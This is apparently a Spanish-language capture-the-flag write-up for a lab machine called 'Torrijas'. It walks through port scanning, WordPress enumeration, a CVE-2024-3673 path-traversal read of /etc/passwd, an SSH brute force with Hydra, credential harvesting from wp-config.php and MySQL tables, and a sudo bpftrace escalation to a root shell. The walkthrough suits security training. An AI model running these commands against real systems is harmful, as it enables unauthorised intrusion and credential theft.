# Torrijas

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.66
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F7Dd6uG82B92YQ1u45F16%2Fimage.png?alt=media&#x26;token=a63ed2a7-0559-412a-85b4-13e95fe4346a" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -p- --open 192.168.1.66 --min-rate 5000 -n
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FIIKUwrjdW11jVH5BDj7P%2Fimage.png?alt=media&#x26;token=fc2b8656-3937-4710-acb7-083aab8c8bbd" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH y** el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80,3306 -v 192.168.1.66
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FqdqyW7v6SM7CMIUtXZlQ%2FCaptura%20de%20pantalla%202025-02-21%20154105.png?alt=media&#x26;token=2aaca090-73c7-4f27-a878-53557f0fddcd" alt=""><figcaption></figcaption></figure>

Revisamos el puerto 80.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F6Xk7gGxkMG8AlfaEC7Q0%2FCaptura%20de%20pantalla%202025-02-21%20154309.png?alt=media&#x26;token=8aaf3425-812b-44b7-995c-ae42e234d171" alt=""><figcaption></figcaption></figure>

Ponemos el dominio **torrija.thl** en `/etc/hosts`. Tras esto realizamos un escaneo de directorios.

```
gobuster dir -u http://192.168.1.66 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,txt,php
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FHyxsh3p733e2Nlde4gnp%2FCaptura%20de%20pantalla%202025-02-21%20155904.png?alt=media&#x26;token=8649bd48-d272-4738-8d40-d3076ed07897" alt=""><figcaption></figcaption></figure>

Nos llama la atención que hay un **wordpress** por lo que indagamos más en ese directorio.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FQoeRy2tKkLhrVBf6t0Zu%2FCaptura%20de%20pantalla%202025-02-21%20160040.png?alt=media&#x26;token=d34cc23d-1c0a-4085-a278-702c1ab6003c" alt=""><figcaption></figcaption></figure>

Enumeramos los usuarios y los plugins con **WPScan**.

```
wpscan --url http://192.168.1.66/wordpress/ --enumerate u,vp
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F7IhtWg9ulXJyxZP9Gajx%2Fimage.png?alt=media&#x26;token=4f478f87-057d-42a5-b3b7-78e31ecc80cb" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Encontramos un usuario pero al realizar fuerza bruta no encuentra la contraseña. Entonces realizo un enumeración de plugins de manera agresiva.

```bash
wpscan --url http://192.168.1.66/wordpress --enumerate ap --force --plugins-detection mixed
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FqfYWVpv60BFVlEptRzfA%2Fimage.png?alt=media&#x26;token=6d3c40b1-c58d-4af4-a8aa-b43ee0953417" alt=""><figcaption></figcaption></figure>

Buscando los dos por Internet nos llama la atención el segundo ya que se puede realizar un **LFI**.

{% embed url="<https://notcve.org/view.php?id=CVE-2024-3673>" %}

{% @github-files/github-code-block url="<https://github.com/Nxploited/CVE-2024-3673>" %}

```
python3 CVE-2024-3673.py --url http://192.168.1.66/wordpress --file ../../../../../etc/passwd
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FfzBJfT1LWnj78pUueYOg%2Fimage.png?alt=media&#x26;token=606f5d58-c518-40e7-9ba0-c1c03a23e4e6" alt=""><figcaption></figcaption></figure>

Encontramos dos usuarios llamados **Primo** y **Premo** pero solo encontramos a través de fuerza bruta la contraseña de **Premo**.

```
hydra -l premo -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.66 -t 64
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FvkxwGUY3Xdjks19XgDf8%2Fimage.png?alt=media&#x26;token=c5cdf3ec-b47c-4e1d-b809-29f5ce949aed" alt=""><figcaption></figcaption></figure>

Nos conectamos con esas credenciales a través de SSH.

```bash
ssh premo@192.168.1.66
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F9XkaroFbewB5Zc8KMr1U%2Fimage.png?alt=media&#x26;token=b4d8e915-53d5-4a72-890b-b016cac93fd2" alt=""><figcaption></figcaption></figure>

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar. No tenemos permisos SUDO.&#x20;

En este caso, al estar trabajando con una instalación de **WordPress** y con el puerto **3306** (MySQL) expuesto, el siguiente paso será intentar obtener las credenciales de la base de datos. Un archivo crucial en WordPress que suele contener esta información es el `wp-config.php`.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FbfmJ22qxydf4MOV2aWXb%2Fimage.png?alt=media&#x26;token=7e3d617e-0cd6-44cc-a256-50eda2344e6f" alt=""><figcaption></figcaption></figure>

Nos conectamos a la base de datos.

```
mysql -u admin -p
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FHFytw0zfGY8DspvHqiUb%2Fimage.png?alt=media&#x26;token=7e4a6614-72c3-4102-a6ed-6b355feb6556" alt=""><figcaption></figcaption></figure>

Indagamos que tenemos en la base de datos.

```
show databases;
use wordpress;
show tables;
select * from wp_users;
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Femi9nsUwwjsAxdQ4kaEY%2Fimage.png?alt=media&#x26;token=4a0dd4c3-3b99-425c-a66e-d687f1d3db8e" alt=""><figcaption></figcaption></figure>

Al ser la contraseña hasheada no nos sirve ya que estamos dentro pero probamos si podemos entrar en la base de datos de **root**.

```
mysql -u admin -p
show databases;
use Torrijas;
show tables;
select * from primo;
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fey2d87Mf4R6Cf3fr311m%2Fimage.png?alt=media&#x26;token=9f540abc-d28d-454e-b5f5-0a4b659f4698" alt=""><figcaption></figcaption></figure>

Nos logueamos con las credenciales.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F9ZvcsX2zN9XMg5f7IF0A%2Fimage.png?alt=media&#x26;token=af76c1e0-fd49-4d3d-a0a6-2f03946a02a4" alt=""><figcaption></figcaption></figure>

{% embed url="<https://gtfobins.github.io/gtfobins/bpftrace/>" %}

```
sudo bpftrace -c /bin/sh -e 'END {exit()}'
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F6kOOBw9ZbTILAniMDXGI%2Fimage.png?alt=media&#x26;token=ce1e1a80-5600-4360-8aad-b2d246f398db" alt=""><figcaption></figcaption></figure>

Ya somos **root**.&#x20;

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
